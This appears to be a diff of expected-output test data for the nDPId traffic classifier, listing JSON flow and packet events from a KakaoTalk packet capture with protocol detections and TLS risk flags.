-00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} -00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069140120,"flow_last_seen":1430069140120,"flow_idle_time":7560000,"flow_min_l4_payload_len":62,"flow_max_l4_payload_len":62,"flow_tot_l4_payload_len":62,"flow_avg_l4_payload_len":62,"midstream":1,"thread_ts_msec":1430069140120,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"103.246.57.251","src_port":51021,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00563{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1430069140120,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":130,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":130,"pkt_l4_len":94,"thread_ts_msec":1430069140120,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAHLza0AAPwZJVQoYUrxn9jn7x00fkMsN+RcrPwfugBgApZHwAAABAQgKAAs11Jj3Xso6AAAArVkC\/4gP\/deLY5qAl+gvk5f8xql5QXAwvM9bb5tQyHwtP1GibAaltsw94jGcvj4NNAB8Nc8SXCTCPg=="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1430069140453,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069140453,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADRbKkAALgby1Gf2OfsKGFK8H5DHTSs\/B+7LDflVgBAADqYIAAABAQgKmPgkmwALNdQ="} +00651{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1430069140501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":194,"pkt_l4_len":158,"thread_ts_msec":1430069140501,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAALJbK0AALgbyVWf2OfsKGFK8H5DHTSs\/B+7LDflVgBgADj7dAAABAQgKmPgkrAALNdR6AAAArVkC\/4gP\/deLY5qAl+gvk5f8hql5QTAwvM9Zf4dQyEAJD7QL56t1BA6CZFNB9CDoZPBzNcfqISYY4Bqx6IvbToog47dFxVed4MxS159GEgFcWpzNI6MS\/uDRtBTN\/KgQO5PWR5hOlzi0NPjPSZ5ZvXYRnArc8Dv9Cys="} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141261,"flow_last_seen":1430069141261,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069141261,"l3_proto":"ip4","src_ip":"120.28.26.242","dst_ip":"10.24.82.188","src_port":80,"dst_port":34533,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1430069141261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141261,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY+0AArAbF1ngcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1430069141403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141403,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjM1kAAPwZ\/FwoYUrx4HBryhuUAUHEB4UFlai7AUBA5CBlHAAA="} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1430069141433,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069141433,"pkt":"AAACEgAAAAAAAAAAAAAIAEUcACgY\/EAArAbF1XgcGvIKGFK8AFCG5WVqLr9xAeFBUBH\/\/1JPAAA="} +00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069141923,"flow_last_seen":1430069141923,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1430069141923,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"54.255.185.236","src_port":58916,"dst_port":5222,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00600{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1430069141923,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":157,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":157,"pkt_l4_len":121,"thread_ts_msec":1430069141923,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAI3lSkAAPwYIYQoYUrw2\/7ns5iQUZtvqJ3tQl6xegBgAe+ktAAABAQgKAAs2irXIgpc8aXEgdG89J3hpYW9taS5jb20nIGlkPScwJyBjaGlkPScwJyB0eXBlPSdnZXQnPjxwaW5nIHhtbG5zPSd1cm46eG1wcDpwaW5nJz48L3Bpbmc+PC9pcT4NCg=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1430069142333,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069142333,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTWOEAALQYpzDb\/uewKGFK8FGbmJFCXrF7b6ifUgBAAZ2sMAAABAQgKtcrV6gALNoo="} +00527{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1430069142373,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":103,"pkt_l4_len":67,"thread_ts_msec":1430069142373,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAFfWOUAALQYpqDb\/uewKGFK8FGbmJFCXrF7b6ifUgBgAZ9bAAAABAQgKtcrV6gALNoo8aXEgY2hpZD0nMCcgaWQ9JzAnIHR5cGU9J3Jlc3VsdCcvPg=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069159456,"flow_last_seen":1430069159456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069159456,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1430069159456,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159456,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvUAAPwaqhQoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOF5AAACBAV4BAIICgALPSMAAAAAAQMDBw=="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1430069159814,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069159814,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUvkAAPwaqhAoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOEVAAACBAV4BAIICgALPYcAAAAAAQMDBw=="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1430069161833,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069161833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzUv0AAPwaqgwoYUrzLzZPXvWkAUI8S6Z4AAAAAoAI2sOBNAAACBAV4BAIICgALPk8AAAAAAQMDBw=="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069161865,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069161865,"l3_proto":"ip4","src_ip":"216.58.220.161","dst_ip":"10.24.82.188","src_port":443,"dst_port":56697,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1430069161865,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069161865,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACioy0AAjgYyVNg63KEKGFK8Abvded6D6B\/TTMkUUBSjubgsAAA="} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1430069159456,"flow_last_seen":1430069161892,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":609,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":1430069161892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Chat"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":0,"content_type":"","user_agent":"MicroMessenger Client"}} +01006{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1430069159456,"flow_last_seen":1430069163198,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":609,"flow_tot_l4_payload_len":815,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1430069163198,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.147.215","src_port":48489,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary Application Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP.QQ","breed":"Fun","category":"Download"},"http": {"hostname":"hkminorshort.weixin.qq.com","url":"http:\/\/hkminorshort.weixin.qq.com\/cgi-bin\/micromsg-bin\/rtkvreport","code":200,"content_type":"application\/octet-stream","user_agent":"MicroMessenger Client"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069163715,"flow_last_seen":1430069163715,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069163715,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="} +00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="} +01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}} +00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7560000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} +01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="} +00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1430069164839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069164839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLThEAAQAZ+OgoYUryLlgB9t2MBu1EoBIpiI9Y5UBiiGP3wAAAmAAAA7+nGaLVdqRc+Gkt7POZ3izYaHM4cfJ\/pKc5wznSY7XhZjDJkzsc="} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164966,"flow_last_seen":1430069164966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069164966,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 